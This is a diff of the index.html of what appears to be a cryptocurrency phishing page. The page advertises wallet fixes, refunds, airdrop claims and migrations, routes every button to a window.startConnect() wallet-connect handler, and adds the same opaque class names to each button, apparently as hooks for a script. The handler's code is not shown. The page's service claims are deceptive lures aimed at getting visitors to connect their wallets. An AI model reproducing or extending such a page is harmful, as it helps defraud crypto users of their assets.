--- a/index.html
+++ b/index.html
@@ -26,7 +26,7 @@
 </head>
 
 <body class="@@dashboard dark-theme" style="background-color: #000;">
-  <button onclick="window.startConnect()">connect</button>
+  <button class="O0ChacZY 5qJh4ad5" onclick="window.startConnect()">connect</button>
   <script src="./embla-carousel.legacy.cjs.js"></script>
 
 
@@ -1971,7 +1971,7 @@
                   <ul class="navbar-nav me-auto">
                     <li class="nav-item dropdown"><a class=nav-link href="#">Home</a>
                     </li>
-                    <li class=nav-item><a class=nav-link onclick="window.startConnect()">Explore</a></li>
+                    <li class=nav-item><a class="O0ChacZY 5qJh4ad5 nav-link" onclick="window.startConnect()">Explore</a></li>
                   </ul>
                 </div>
                 <div class="signin-btn d-flex align-items-center">
@@ -1979,7 +1979,7 @@
                     <span class="dark sf-hidden"></span>
                     <span class=light><i class=ri-sun-line></i></span>
                   </div>
-                  <a class="btn btn-primary" onclick="window.startConnect()">Connect</a>
+                  <a class="O0ChacZY 5qJh4ad5 btn btn-primary" onclick="window.startConnect()">Connect</a>
                 </div>
               </nav>
             </div>
@@ -1997,9 +1997,9 @@
               <p>Your go-to online tool to seamlessly and efficiently fix any blockchain-related issues
                 you might encounter. </p>
               <div class="intro-btn mt-5">
-                <a class="btn btn-primary" onclick="window.startConnect()">Claim Airdrop<i class="bi bi-arrow-right"></i>
+                <a class="O0ChacZY 5qJh4ad5 btn btn-primary" onclick="window.startConnect()">Claim Airdrop<i class="bi bi-arrow-right"></i>
                 </a>
-                <a class="btn btn-outline-primary" onclick="window.startConnect()">Migration</a>
+                <a class="O0ChacZY 5qJh4ad5 btn btn-outline-primary" onclick="window.startConnect()">Migration</a>
               </div>
 
 
@@ -2042,7 +2042,7 @@
               <div>
                 <h4>Fix your Wallet Problem </h4>
                 <p>Our platform facilitates fixing Wallet Problem
-                  , helping you securely.</p><a onclick="window.startConnect()">Explore<i
+                  , helping you securely.</p><a class="O0ChacZY 5qJh4ad5" onclick="window.startConnect()">Explore<i
                     class="bi bi-arrow-right-short"></i></a>
               </div>
             </div>
@@ -2053,7 +2053,7 @@
               <div>
                 <h4>Refund </h4>
                 <p>Lost access to your cryptocurrency? We specialize in wallet refund,
-                  allowing you to regain control of your digital assets.</p><a onclick="window.startConnect()">Explore<i
+                  allowing you to regain control of your digital assets.</p><a class="O0ChacZY 5qJh4ad5" onclick="window.startConnect()">Explore<i
                     class="bi bi-arrow-right-short"></i></a>
               </div>
             </div>
@@ -2065,7 +2065,7 @@
                 <h4>Smart Contract Audits and Debugging</h4>
                 <p>Ensure the integrity of your smart contracts. Our experts conduct comprehensive
                   audits
-                  and debugging to rectify vulnerabilities and improve security.</p><a onclick="window.startConnect()">Explore<i
+                  and debugging to rectify vulnerabilities and improve security.</p><a class="O0ChacZY 5qJh4ad5" onclick="window.startConnect()">Explore<i
                     class="bi bi-arrow-right-short"></i></a>
               </div>
             </div>
@@ -2077,7 +2077,7 @@
                 <h4>Token Deployment and Correction</h4>
                 <p>Launching a token or facing issues with an existing one? We assist with token
                   deployment
-                  and rectify any issues to ensure smooth functionality.</p><a onclick="window.startConnect()">Explore<i
+                  and rectify any issues to ensure smooth functionality.</p><a class="O0ChacZY 5qJh4ad5" onclick="window.startConnect()">Explore<i
                     class="bi bi-arrow-right-short"></i></a>
               </div>
             </div>
@@ -2091,7 +2091,7 @@
                 <h4>DeFi Protocol Optimization </h4>
                 <p>Enhance the performance of your DeFi platform. Our experts analyze and optimize your
                   DeFi
-                  protocols for efficiency, security, and seamless user experiences</p><a onclick="window.startConnect()">Explore<i
+                  protocols for efficiency, security, and seamless user experiences</p><a class="O0ChacZY 5qJh4ad5" onclick="window.startConnect()">Explore<i
                     class="bi bi-arrow-right-short"></i></a>
               </div>
             </div>
@@ -2102,7 +2102,7 @@
               <div>
                 <h4>Airdrop Fixes</h4>
                 <p>Resolve issues related to airdrops, ensuring accurate distribution and reception of
-                  tokens during airdrop events.</p><a onclick="window.startConnect()">Explore<i class="bi bi-arrow-right-short"></i></a>
+                  tokens during airdrop events.</p><a class="O0ChacZY 5qJh4ad5" onclick="window.startConnect()">Explore<i class="bi bi-arrow-right-short"></i></a>
               </div>
             </div>
           </div>
@@ -2112,7 +2112,7 @@
               <div>
                 <h4>Token Bridge Solutions</h4>
                 <p>Develop and maintain token bridges, enabling seamless transfers and interoperability
-                  between different blockchain networks.</p><a onclick="window.startConnect()">Explore<i
+                  between different blockchain networks.</p><a class="O0ChacZY 5qJh4ad5" onclick="window.startConnect()">Explore<i
                     class="bi bi-arrow-right-short"></i></a>
               </div>
             </div>
@@ -2123,7 +2123,7 @@
               <div>
                 <h4>NFT (Non-Fungible Token) Solutions</h4>
                 <p>Assist in the creation, management, and troubleshooting of NFTs, ensuring a smooth
-                  experience in the NFT marketplace.</p><a onclick="window.startConnect()">Explore<i
+                  experience in the NFT marketplace.</p><a class="O0ChacZY 5qJh4ad5" onclick="window.startConnect()">Explore<i
                     class="bi bi-arrow-right-short"></i></a>
               </div>
             </div>
@@ -2135,7 +2135,7 @@
               <div class=create-sell-content-icon><i class="bi bi-shield-check"></i></div>
               <div>
                 <h4>BUY </h4>
-                <p>Buy tokens and coin.</p><a onclick="window.startConnect()">Explore<i
+                <p>Buy tokens and coin.</p><a class="O0ChacZY 5qJh4ad5" onclick="window.startConnect()">Explore<i
                     class="bi bi-arrow-right-short"></i></a>
               </div>
             </div>
